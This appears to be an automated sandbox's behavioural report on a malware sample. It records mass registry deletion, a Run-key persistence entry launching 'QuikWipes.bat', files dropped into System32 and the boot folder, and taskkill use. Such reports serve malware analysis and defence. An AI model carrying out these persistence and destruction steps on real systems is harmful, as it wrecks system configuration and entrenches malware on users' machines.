Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8A683C93-BA84-11CF-8110-00A0C9030074}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0077-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\QuikWipes.bat" C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\QuikWipes.bat" C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Windows\system32\reg.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} C:\Windows\system32\reg.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Windows\system32\reg.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\LogonUI.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\SysWOW64\* C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\ickr0a.exe C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~4 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\ShellUI.MST C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0000000010\9.0.0\UL_MSV~3.98C C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_7457~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRDDAB~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~2.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UI3EAD~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_CENT~4 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_77A9~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_68A2~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_5CEF~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~4.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIA3D3~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\WINDOW~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_CENT~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_A468~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_AE83~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PR8CA8~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~2 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~4.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~3.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UI9BD8~1.DLL C:\Windows\system32\cmd.exe N/A
File created C:\Windows\Windows\System32\LogonUI.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0000000010\9.0.0\UL_MSV~1.98C C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\2e30.msp C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYDE67~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\PDFFIL~1.ICO C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\PDXFIL~1.ICO C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\5094.msp C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\grvicons.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~2.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~3 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\WPFGFX~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\RMFFIL~1.ICO C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_B2C0~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_3369~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PENIMC~4.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~3 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\XDPFIL~1.ICO C:\Windows\system32\cmd.exe N/A
File created C:\Windows\Boot\EFI\* C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\MICROS~2.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\misc.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00004109110000000000000000F01FEC\14.0.4763\INKDIV~1.8F0 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_8C6C~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\MICROS~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~3.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{90140000-002A-0000-1000-0000000FF1CE}\ShellUI.MST C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_FCCC~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~4.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~4 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\APIFIL~1.ICO C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_REA~1.EXE C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PE3AC5~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~4 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SY2C2F~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\cagicon.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PENIMC~3.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~2.MUI C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\1b67.msp C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\pubs.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\{90140000-006E-0409-0000-0000000FF1CE}\misc.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_BB64~1 C:\Windows\system32\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\reg.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\System32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8D670533-270B-4549-B19B-414FB9C6EBDB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\NSCSINGLEEXPAND C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_XML_PROLOG C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0002000D-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{DF0B3D60-548F-101B-8E65-08002B2BD119} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\CACHE_FLUSH C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{1FBA04EE-3024-11d2-8F1F-0000F87ABD16} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{809B6661-94C4-49E6-B6EC-3F0F862215AA} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{03D9F3F2-B0E3-11D2-B081-006008039BF0} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpeg C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\MSN C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{314111C6-A502-11D2-BBCA-00C04F8EC294} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{69AD90EF-1C20-11d1-8801-00C04FC29D46} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CAAFDD83-CEFC-4E3D-BA03-175F17A24F91} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D256B2D9-9C58-445A-8C38-C3AAA84EF137} C:\Windows\system32\reg.exe N/A
